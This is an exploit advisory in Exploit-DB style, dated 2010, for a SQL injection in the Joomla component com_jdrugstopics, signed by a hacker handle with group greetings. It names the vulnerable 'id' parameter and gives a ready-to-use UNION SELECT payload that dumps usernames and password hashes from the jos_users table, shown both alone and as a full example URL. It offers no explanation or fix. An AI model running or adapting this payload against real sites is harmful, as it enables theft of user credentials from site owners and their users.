Joomla! Component com_jdrugstopics - SQL Injection

EDB-ID:

12183

CVE:

N/A


Platform:

PHP

Published:

2010-04-12

# Title: Joomla Component com_jdrugstopics SQL Injection Vulnerability 
# Author: SadHaCkEr
# Data  : 2010-04-12
 
[~]######################################### InformatioN #############################################[~]

#AUTHOR:            SadHaCkEr                                                
#Email:             n5s@hotmail.[choose ANY ONE]   IF U lucky  U will Find Me                             
#Website:           http://www.sadx.297m.com/                                
#Forum :            http://v4-team.net/cc                                    
    
[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable  :
  
http://127.0.0.1/index.php?option=com_jdrugstopics&view=drugsdetails&id=[SQL]
  
[~] ExploiT         :
  
-226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_jdrugstopics&view=drugsdetails&id=
-226 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from jos_users--

 
   
[~]######################################### ThankS To ... ############################################[~]
  
[~] Special Thanks 2 :
  
RoMaNcYxHaCkEr, Mr.Safa7, Mn7oS & Sniper Code & Red Virus & HCJ & Mr.Wolf & ayaster & All Trayg Member .
  
[~] Trayg Team + V4-Team + SVT Team 
  
[~] GreetZ 2: My LoV3r + My Keyboard
 
[~]#########################################  ./Done   #############################################[~]